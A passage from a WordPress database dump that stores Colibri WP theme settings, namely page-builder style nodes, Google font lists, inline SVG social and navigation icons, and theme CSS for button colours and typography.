\"id\":978,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c11\"]},{\"id\":979,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c15\"]},{\"id\":980,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c17\"]},{\"id\":981,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c21\"]},{\"id\":982,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c23\"]},{\"id\":983,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c27\"]},{\"id\":984,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c70\"]},{\"id\":985,\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"182-c71\"]},{\"id\":986,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c72\"]}]\";}','yes'),(354,'colibriwp_activate_theme_name','colibri-wp','yes'),(355,'colibri_page_builder_regenerate_tries_count','1','yes'),(357,'colibriwp_fix_wp58_sidebar','1','yes'),(358,'colibri_page_builder_use_fs','c-2f25a335-3ef214be-c8dc42e-7faa310b','yes');
INSERT INTO `wp_options` VALUES (361,'extend_builder_theme_1644939954','a:13:{s:5:\"fonts\";a:2:{s:6:\"google\";a:3:{s:4:\"Muli\";a:2:{s:7:\"weights\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"400\";i:5;s:9:\"400italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Open Sans\";a:2:{s:7:\"weights\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"400\";i:3;s:9:\"400italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Playfair Display\";a:2:{s:7:\"weights\";a:6:{i:0;s:3:\"400\";i:1;s:9:\"400italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:3:\"900\";i:5;s:9:\"900italic\";}s:8:\"category\";s:10:\"sans-serif\";}}s:6:\"native\";a:0:{}}s:11:\"dummyChange\";s:0:\"\";s:5:\"icons\";a:11:{s:17:\"brandico/facebook\";s:284:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"facebook\" viewBox=\"0 0 486.037 1007\"><path d=\"M124 1005V536H0V367h124V223C124 110 197 5 366 5c68 0 119 7 119 7l-4 158s-52-1-108-1c-61 0-71 28-71 75v123h183l-8 169H302v469H123\"/></svg>\";s:17:\"font-awesome/star\";s:395:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"star\" viewBox=\"0 0 1664 1896.0833\"><path d=\"M1664 647q0 22-26 48l-363 354 86 500q1 7 1 20 0 21-10.5 35.5T1321 1619q-19 0-40-12l-449-236-449 236q-22 12-40 12-21 0-31.5-14.5T301 1569q0-6 2-20l86-500L25 695Q0 668 0 647q0-37 56-46l502-73L783 73q19-41 49-41t49 41l225 455 502 73q56 9 56 46z\"/></svg>\";s:28:\"font-awesome/facebook-square\";s:410:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"facebook-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1248 128q119 0 203.5 84.5T1536 416v960q0 119-84.5 203.5T1248 1664h-188v-595h199l30-232h-229V689q0-56 23.5-84t91.5-28l122-1V369q-63-9-178-9-136 0-217.5 80T820 666v171H620v232h200v595H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960z\"/></svg>\";s:27:\"font-awesome/twitter-square\";s:630:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"twitter-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1280 610q-56 25-121 34 68-40 93-117-65 38-134 51-61-66-153-66-87 0-148.5 61.5T755 722q0 29 5 48-129-7-242-65T326 550q-29 50-29 106 0 114 91 175-47-1-100-26v2q0 75 50 133.5t123 72.5q-29 8-51 8-13 0-39-4 21 63 74.5 104t121.5 42q-116 90-261 90-26 0-50-3 148 94 322 94 112 0 210-35.5t168-95 120.5-137 75-162T1176 746q0-18-1-27 63-45 105-109zm256-194v960q0 119-84.5 203.5T1248 1664H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960q119 0 203.5 84.5T1536 416z\"/></svg>\";s:27:\"font-awesome/youtube-square\";s:1354:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"youtube-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M919 1303v-157q0-50-29-50-17 0-33 16v224q16 16 33 16 29 0 29-49zm184-122h66v-34q0-51-33-51t-33 51v34zM532 915v70h-80v423h-74V985h-78v-70h232zm201 126v367h-67v-40q-39 45-76 45-33 0-42-28-6-17-6-54v-290h66v270q0 24 1 26 1 15 15 15 20 0 42-31v-280h67zm252 111v146q0 52-7 73-12 42-53 42-35 0-68-41v36h-67V915h67v161q32-40 68-40 41 0 53 42 7 21 7 74zm251 129v9q0 29-2 43-3 22-15 40-27 40-80 40-52 0-81-38-21-27-21-86v-129q0-59 20-86 29-38 80-38t78 38q21 29 21 86v76h-133v65q0 51 34 51 24 0 30-26 0-1 .5-7t.5-16.5V1281h68zM785 457v156q0 51-32 51t-32-51V457q0-52 32-52t32 52zm533 713q0-177-19-260-10-44-43-73.5t-76-34.5q-136-15-412-15-275 0-411 15-44 5-76.5 34.5T238 910q-20 87-20 260 0 176 20 260 10 43 42.5 73t75.5 35q137 15 412 15t412-15q43-5 75.5-35t42.5-73q20-84 20-260zM563 519l90-296h-75l-51 195-53-195h-78q7 23 23 69l24 69q35 103 46 158v201h74V519zm289 81V470q0-58-21-87-29-38-78-38-51 0-78 38-21 29-21 87v130q0 58 21 87 27 38 78 38 49 0 78-38 21-27 21-87zm181 120h67V350h-67v283q-22 31-42 31-15 0-16-16-1-2-1-26V350h-67v293q0 37 6 55 11 27 43 27 36 0 77-45v40zm503-304v960q0 119-84.5 203.5T1248 1664H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960q119 0 203.5 84.5T1536 416z\"/></svg>\";s:25:\"font-awesome/vimeo-square\";s:540:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"vimeo-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1292 638q10-216-161-222-231-8-312 261 44-19 82-19 85 0 74 96-4 57-74 167t-105 110q-43 0-82-169-13-54-45-255-30-189-160-177-59 7-164 100l-81 72-81 72 52 67q76-52 87-52 57 0 107 179 15 55 45 164.5t45 164.5q68 179 164 179 157 0 383-294 220-283 226-444zm244-222v960q0 119-84.5 203.5T1248 1664H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960q119 0 203.5 84.5T1536 416z\"/></svg>\";s:17:\"font-awesome/plus\";s:353:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"plus\" viewBox=\"0 0 1408 1896.0833\"><path d=\"M1408 736v192q0 40-28 68t-68 28H896v416q0 40-28 68t-68 28H608q-40 0-68-28t-28-68v-416H96q-40 0-68-28T0 928V736q0-40 28-68t68-28h416V224q0-40 28-68t68-28h192q40 0 68 28t28 68v416h416q40 0 68 28t28 68z\"/></svg>\";s:18:\"font-awesome/minus\";s:251:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"minus\" viewBox=\"0 0 1408 1896.0833\"><path d=\"M1408 736v192q0 40-28 68t-68 28H96q-40 0-68-28T0 928V736q0-40 28-68t68-28h1216q40 0 68 28t28 68z\"/></svg>\";s:25:\"font-awesome/chevron-left\";s:320:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"chevron-left\" viewBox=\"0 0 1289.1823 1896.0833\"><path d=\"M1171 301L640 832l531 531q19 19 19 45t-19 45l-166 166q-19 19-45 19t-45-19L173 877q-19-19-19-45t19-45L915 45q19-19 45-19t45 19l166 166q19 19 19 45t-19 45z\"/></svg>\";s:26:\"font-awesome/chevron-right\";s:317:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"chevron-right\" viewBox=\"0 0 1280 1896.0833\"><path d=\"M1107 877l-742 742q-19 19-45 19t-45-19l-166-166q-19-19-19-45t19-45l531-531-531-531q-19-19-19-45t19-45L275 45q19-19 45-19t45 19l742 742q19 19 19 45t-19 45z\"/></svg>\";s:17:\"font-awesome/bars\";s:439:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"/></svg>\";}s:3:\"css\";s:16346:\"\n.h-y-container > *:not(:last-child), .h-x-container-inner > * {\n  margin-bottom: 20px;\n}\n.h-x-container-inner, .h-column__content > .h-x-container > *:last-child {\n  margin-bottom: -20px;\n}\n.h-x-container-inner > * {\n  padding-left: 10px;\n  padding-right: 10px;\n}\n.h-x-container-inner {\n  margin-left: -10px;\n  margin-right: -10px;\n}\n[class*=style-], [class*=local-style-], .h-global-transition, .h-global-transition-all, .h-global-transition-all * {\n  transition-duration: 0.5s;\n}\n.wp-block-button .wp-block-button__link:not(.has-background),.wp-block-file .wp-block-file__button {\n  background-color: #03a9f4;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link:not(.has-background):hover,.wp-block-button .wp-block-button__link:not(.has-background):focus,.wp-block-button .wp-block-button__link:not(.has-background):active,.wp-block-file .wp-block-file__button:hover,.wp-block-file .wp-block-file__button:focus,.wp-block-file .wp-block-file__button:active {\n  background-color: rgb(2, 110, 159);\n  background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background) {\n  color: #03a9f4;\n  background-color: transparent;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #03a9f4;\n  border-top-style: solid;\n  border-right-width: 2px;\n  border-right-color: #03a9f4;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #03a9f4;\n  border-bottom-style: solid;\n  border-left-width: 2px;\n  border-left-color: #03a9f4;\n  border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background):hover,.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background):focus,.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background):active {\n  color: #fff;\n  background-color: #03a9f4;\n  background-image: none;\n}\n.has-background-color,*[class^=\"wp-block-\"].is-style-solid-color {\n  background-color: #03a9f4;\n  background-image: none;\n}\n.has-colibri-color-1-background-color {\n  background-color: #03a9f4;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color {\n  background-color: #03a9f4;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color:active {\n  background-color: rgb(2, 110, 159);\n  background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color {\n  color: #03a9f4;\n  background-color: transparent;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #03a9f4;\n  border-top-style: solid;\n  border-right-width: 2px;\n  border-right-color: #03a9f4;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #03a9f4;\n  border-bottom-style: solid;\n  border-left-width: 2px;\n  border-left-color: #03a9f4;\n  border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color:active {\n  color: #fff;\n  background-color: #03a9f4;\n  background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-1-background-color,*[class^=\"wp-block-\"] .has-colibri-color-1-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-1-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-1-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-1-color p {\n  background-color: #03a9f4;\n  background-image: none;\n}\n.has-colibri-color-1-color {\n  color: #03a9f4;\n}\n.has-colibri-color-2-background-color {\n  background-color: #f79007;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color {\n  background-color: #f79007;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color:active {\n  background-color: rgb(162, 94, 5);\n  background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color {\n  color: #f79007;\n  background-color: transparent;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #f79007;\n  border-top-style: solid;\n  border-right-width: 2px;\n  border-right-color: #f79007;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #f79007;\n  border-bottom-style: solid;\n  border-left-width: 2px;\n  border-left-color: #f79007;\n  border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color:active {\n  color: #fff;\n  background-color: #f79007;\n  background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-2-background-color,*[class^=\"wp-block-\"] .has-colibri-color-2-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-2-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-2-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-2-color p {\n  background-color: #f79007;\n  background-image: none;\n}\n.has-colibri-color-2-color {\n  color: #f79007;\n}\n.has-colibri-color-3-background-color {\n  background-color: #00bf87;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color {\n  background-color: #00bf87;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color:active {\n  background-color: rgb(0, 106, 75);\n  background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color {\n  color: #00bf87;\n  background-color: transparent;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #00bf87;\n  border-top-style: solid;\n  border-right-width: 2px;\n  border-right-color: #00bf87;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #00bf87;\n  border-bottom-style: solid;\n  border-left-width: 2px;\n  border-left-color: #00bf87;\n  border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color:active {\n  color: #fff;\n  background-color: #00bf87;\n  background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-3-background-color,*[class^=\"wp-block-\"] .has-colibri-color-3-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-3-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-3-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-3-color p {\n  background-color: #00bf87;\n  background-image: none;\n}\n.has-colibri-color-3-color {\n  color: #00bf87;\n}\n.has-colibri-color-4-background-color {\n  background-color: #6632ff;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color {\n  background-color: #6632ff;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color:active {\n  background-color: rgb(68, 33, 170);\n  background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color {\n  color: #6632ff;\n  background-color: transparent;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #6632ff;\n  border-top-style: solid;\n  border-right-width: 2px;\n  border-right-color: #6632ff;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #6632ff;\n  border-bottom-style: solid;\n  border-left-width: 2px;\n  border-left-color: #6632ff;\n  border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color:active {\n  color: #fff;\n  background-color: #6632ff;\n  background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-4-background-color,*[class^=\"wp-block-\"] .has-colibri-color-4-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-4-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-4-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-4-color p {\n  background-color: #6632ff;\n  background-image: none;\n}\n.has-colibri-color-4-color {\n  color: #6632ff;\n}\n.has-colibri-color-5-background-color {\n  background-color: #FFFFFF;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color {\n  background-color: #FFFFFF;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color:active {\n  background-color: rgb(102, 102, 102);\n  background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color {\n  color: #FFFFFF;\n  background-color: transparent;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #FFFFFF;\n  border-top-style: solid;\n  border-right-width: 2px;\n  border-right-color: #FFFFFF;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #FFFFFF;\n  border-bottom-style: solid;\n  border-left-width: 2px;\n  border-left-color: #FFFFFF;\n  border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color:active {\n  color: #fff;\n  background-color: #FFFFFF;\n  background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-5-background-color,*[class^=\"wp-block-\"] .has-colibri-color-5-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-5-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-5-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-5-color p {\n  background-color: #FFFFFF;\n  background-image: none;\n}\n.has-colibri-color-5-color {\n  color: #FFFFFF;\n}\n.has-colibri-color-6-background-color {\n  background-color: rgb(0, 0, 0);\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color {\n  background-color: rgb(0, 0, 0);\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color:active {\n  background-color: rgb(51, 51, 51);\n  background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color {\n  color: rgb(0, 0, 0);\n  background-color: transparent;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: rgb(0, 0, 0);\n  border-top-style: solid;\n  border-right-width: 2px;\n  border-right-color: rgb(0, 0, 0);\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: rgb(0, 0, 0);\n  border-bottom-style: solid;\n  border-left-width: 2px;\n  border-left-color: rgb(0, 0, 0);\n  border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color:active {\n  color: #fff;\n  background-color: rgb(0, 0, 0);\n  background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-6-background-color,*[class^=\"wp-block-\"] .has-colibri-color-6-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-6-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-6-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-6-color p {\n  background-color: rgb(0, 0, 0);\n  background-image: none;\n}\n.has-colibri-color-6-color {\n  color: rgb(0, 0, 0);\n}\n.h-section-global-spacing {\n  padding-top: 90px;\n  padding-bottom: 90px;\n}\nbody {\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  line-height: 1.6;\n  color: rgb(153, 153, 153);\n}\nbody a {\n  font-family: Open Sans;\n  font-weight: 400;\n  text-decoration: none;\n  font-size: 1em;\n  line-height: 1.5;\n  color: #03a9f4;\n}\nbody a:hover {\n  color: rgb(2, 110, 159);\n}\nbody p {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  line-height: 1.6;\n  color: rgb(153, 153, 153);\n}\nbody .h-lead p {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 300;\n  font-size: 1.25em;\n  line-height: 1.5;\n  color: rgb(102, 102, 102);\n}\nbody blockquote p {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  line-height: 1.6;\n  color: rgb(153, 153, 153);\n}\nbody h1 {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 300;\n  font-size: 3.375em;\n  line-height: 1.26;\n  color: rgb(51, 51, 51);\n}\nbody h2 {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 300;\n  font-size: 2.625em;\n  line-height: 1.143;\n  color: rgb(51, 51, 51);\n}\nbody h3 {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 300;\n  font-size: 2.25em;\n  line-height: 1.25;\n  color: rgb(51, 51, 51);\n}\nbody h4 {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 600;\n  font-size: 1.25em;\n  line-height: 1.6;\n  color: rgb(51, 51, 51);\n}\nbody h5 {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 600;\n  font-size: 1.125em;\n  line-height: 1.55;\n  color: rgb(51, 51, 51);\n}\nbody h6 {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 600;\n  font-size: 1em;\n  line-height: 1.6;\n  color: rgb(51, 51, 51);\n}\n .content.colibri-main-content-single .main-section,.content.colibri-main-content-archive .main-section {\n  padding-top: 90px;\n  padding-bottom: 90px;\n}\n .content.colibri-main-content-single .main-section .colibri-sidebar.blog-sidebar-right,.content.colibri-main-content-archive .main-section .colibri-sidebar.blog-sidebar-right {\n  width: 25% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  max-width: 25%;\n}\n\n\n@media (min-width: 768px) and (max-width: 1023px){\n.h-section-global-spacing {\n  padding-top: 60px;\n  padding-bottom: 60px;\n}\n .content.colibri-main-content-single .main-section .colibri-sidebar.blog-sidebar-right,.content.colibri-main-content-archive .main-section .colibri-sidebar.blog-sidebar-right {\n  width: 33.33% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  max-width: 33.33%;\n}\n\n}\n\n@media (max-width: 767px){\n.h-section-global-spacing {\n  padding-top: 30px;\n  padding-bottom: 30px;\n}\n .content.colibri-main-content-single .main-section .colibri-sidebar.blog-sidebar-right,.content.colibri-main-content-archive .main-section .colibri-sidebar.blog-sidebar-right {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  max-width: 